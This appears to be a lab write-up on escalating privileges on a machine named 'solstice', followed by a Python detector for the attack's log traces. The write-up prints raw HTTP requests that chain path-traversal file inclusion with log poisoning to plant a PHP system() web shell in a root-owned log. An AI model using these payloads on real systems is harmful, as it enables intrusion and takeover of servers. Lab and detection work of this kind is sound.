Priv Esc
find / -type f -perm -04000 -ls 2>/dev/null
www-data@solstice:/dev/shm$ cat /var/log/apache2/access.log.1
cat /var/log/apache2/access.log.1
www-data@solstice:/dev/shm$ echo test > /var/log/apache2/access.log.1
echo test > /var/log/apache2/access.log.1
www-data@solstice:/dev/shm$ ^[[A^[[A
echo test > /var/log/apache2cat.1
test
www-data@solstice:/dev/shm$
Had to revert the machine, but the gist is to get RCE via the first access log, then use it to add PHP code into the root-owned one, then pop a shell.
GET /index.php?book=../../../../../../var/log/apache2/access.log&cmd=echo+"<%3fphp+echo+system($_GET['cmd'])%3b%3f>"+>+/var/log/apache2/error.log.1 HTTP/1.1
Host: 192.168.184.72:8593
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.184.72:8593/
Connection: close
Cookie: PHPSESSID=r1j4rc7vl1h5k6u72jt8pfis8b
Upgrade-Insecure-Requests: 1
GET /index.php?book=../../../../../../var/log/apache2/access.log&cmd=cat+/var/log/apache2/error.log.1 HTTP/1.1
Host: 192.168.184.72:8593
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://192.168.184.72:8593/
Connection: close
Cookie: PHPSESSID=r1j4rc7vl1h5k6u72jt8pfis8b
Upgrade-Insecure-Requests: 1
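For detection, both requests above leave the same trace in the Apache access log: a `book` value that climbs out of the web root into /var/log, and a `cmd` value carrying a PHP open tag or a log path. The following Python check is an added example, not part of the original writeup; it assumes the combined log format, and the sample log lines (client address, timestamp, status, size, and the benign third request) are constructed around the two requests shown.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Combined log format. Apache writes a literal " in the request as \", so the
# request field is matched as "escaped char, or anything but quote/backslash".
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "((?:[^"\\]|\\.)*)" (\d{3}) ')
TRAVERSAL_RE = re.compile(r'(?:\.\./){2,}')          # two or more ../ in a row
LOG_PATH_RE = re.compile(r'/var/log/')               # parameter points at a log
PHP_TAG_RE = re.compile(r'<\?(?:php|=)', re.IGNORECASE)


def findings(line):
    """Return 'rule:parameter' strings for one access-log line."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparsed"]
    request = re.sub(r'\\(["\\])', r'\1', m.group(2))   # undo \" and \\ escaping
    parts = request.split(" ")
    target = " ".join(parts[1:-1]) if len(parts) >= 3 else request
    hits = []
    # parse_qsl decodes + and %xx, so %3fphp is seen as ?php
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if LOG_PATH_RE.search(value):
            rule = "lfi-log-include" if TRAVERSAL_RE.search(value) else "log-path"
            hits.append(f"{rule}:{name}")
        if PHP_TAG_RE.search(value):
            hits.append(f"php-tag:{name}")
    return hits


# Constructed sample lines: the first two request targets are the ones shown on
# this page; everything else in each line is made up for the example.
SAMPLE = [
    r'''192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?book=../../../../../../var/log/apache2/access.log&cmd=echo+\"<%3fphp+echo+system($_GET['cmd'])%3b%3f>\"+>+/var/log/apache2/error.log.1 HTTP/1.1" 200 512 "http://192.168.184.72:8593/" "Mozilla/5.0"''',
    r'''192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?book=../../../../../../var/log/apache2/access.log&cmd=cat+/var/log/apache2/error.log.1 HTTP/1.1" 200 512 "http://192.168.184.72:8593/" "Mozilla/5.0"''',
    r'''192.0.2.11 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php?book=list HTTP/1.1" 200 1024 "-" "Mozilla/5.0"''',
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(findings(line), line[:60])
```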